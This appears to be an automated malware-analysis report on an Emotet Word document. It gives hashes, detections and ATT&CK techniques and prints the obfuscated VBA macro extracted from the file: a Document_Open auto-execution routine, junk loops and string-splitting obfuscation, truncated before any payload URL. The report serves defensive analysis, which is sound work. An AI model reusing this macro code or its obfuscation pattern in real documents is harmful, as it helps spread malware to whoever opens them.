Emotet Office (OLE) malware analysis — malicious · a95e5f3c88c9004b

MALICIOUS

Office (OLE)

183.1 KB Created: 2019-12-20 17:07:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 77a750dd8ea463eeaf1d63422332b2fd SHA-1: b3ca35d89f7e387478a52060613a5e7e9e58b4d4 SHA-256: a95e5f3c88c9004ba2daf3ee43e7ade9b2245c535c4cb19cdcad348f261f2874

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7473497-0', strongly suggesting the Emotet family. The presence of a 'Document_Open' VBA macro, which is designed to execute automatically when the document is opened, indicates an attempt to run malicious code. The macro's obfuscated nature and the 'GetObject' call further support this, pointing towards a downloader or initial execution stage.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7618 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7618 bytes
SHA-256: `4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Aojplemq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox" Private Sub Document_open() Ltyncvvwo = 234 + 423 Do While Cikubwvivihv = 1 Hcmhzkjwdl = 3 * Fqdsyasenoww Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.") For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh Bnbajuowvggcm = ("Rerum ad nihil vel.") Gingzqsy = 223 Next Uuavxkoiio = Elfrlfbvs Loop Ewxdqdei Ewdbqeofwfve = 234 + 423 Do While Ucwjhgwmvyh = 1 Rdkgxjky = 3 * Hscfaewhrzd Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.") For Lzxvhrtl = Favhzrpsxom To Trngalouzizs Wrljfjwzrb = ("Velit saepe.") Ndffipzh = 223 Next Ulszawfr = Chtalegcvuz Loop End Sub Attribute VB_Name = "Jeuwzqvsdrcqz" Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Rgzhzedt" Function Ypzdgmswtvdol() Ecpsjpwmt = 234 + 423 Do While Iflpcowzdtqob = 1 Qlrgusoolmu = 3 * Evuphzdzzkfb Mnnnndwy = ("Et.") For Nqguqadhjbui = Gckorame To Bbxyhbyfjab Jiygysjieomg = ("Enim ut vel.") Hhkijhrspcfz = 223 Next Oyzzpjbf = Nlzgxmlswiqx Loop Ccahqiqatqpii = Aojplemq.Gzuokbkyuug Xoxcfslhh = 234 + 423 Do While Pkocrnurft = 1 Kkoupcjxomswo = 3 * Llcoewtryqjb Bqljpnrrywfxb = ("Autem.") For Sroysigd = Cqtqegapan To Nyfcungih Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.") Upfiaghl = 223 Next Tqotxwchqfk = Xomriamlhe Loop Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu Zcyuqbzhudyk = 234 + 423 Do While Wvxzhtphlfoe = 1 Ibunrqdbman = 3 * Aoxboyme Vjpfsrtgmsmz = ("In tempora dolor aut amet.") For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.") Jkgqadlqc = 223 Next Xmwymfrzzqoo = Skfbpvqn Loop Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag Lhsyghafslbi = 234 + 423 Do While Letzvixom = 1 Xdgyuyaelpj = 3 * Hgrkaaarl Gdjeewwuxkid = ("Ea et.") For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz Uphpromjiicnw = ("Magnam.") Pgxecxxnq = 223 Next Ntkkyuimxzkb = Ofkffhbrs Loop Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq Yyqtlblmjar = 234 + 423 Do While Usazcqclwva = 1 Bvovtqeuu = 3 * Dwiiuaeoe Iihvwfbbcqq = ("Quaerat id voluptates quis est.") For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup Plpplkfme = ("Dicta.") Pcryihkdhla = 223 Next Zavjsxectfr = Enincmvatq Loop End Function Function Ewxdqdei() Hhahpldlmgytv = 234 + 423 Do While Bdbvsqpntmg = 1 Cpsroosgidlmw = 3 * Nxrrvfnk Iisthuiee = ("Larry") For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk Ujcwmygukzttl = ("Ronnie") Puyciwrsobfm = 223 Next Gifyxuvw = Gurqiiogepkv Loop iwiwiiwiwjjsj = "__&888&^bBGks^@" Dxztlkebm = 234 + 423 Do While Ngqkvsvdtavag = 1 Mvopoxnzbmda = 3 Vpwvlvkkk Xiaghwsmsyin = ("Sint hic officiis vel.") For Bagoxrskw = Yfumibldur To Ttpkosinbao Evmtdnmdvjry = ("Et.") Wwjcpnmnvh = 223 Next Rojjyrkr = Zjqecjxky Loop Uqdvmpngkfcs = Split("__&888&^bBGks^@wi__&888&^bBGks^@nmg__&888&^b" + "BGks^@mts__&888&^b ... (truncated)

SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub

Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.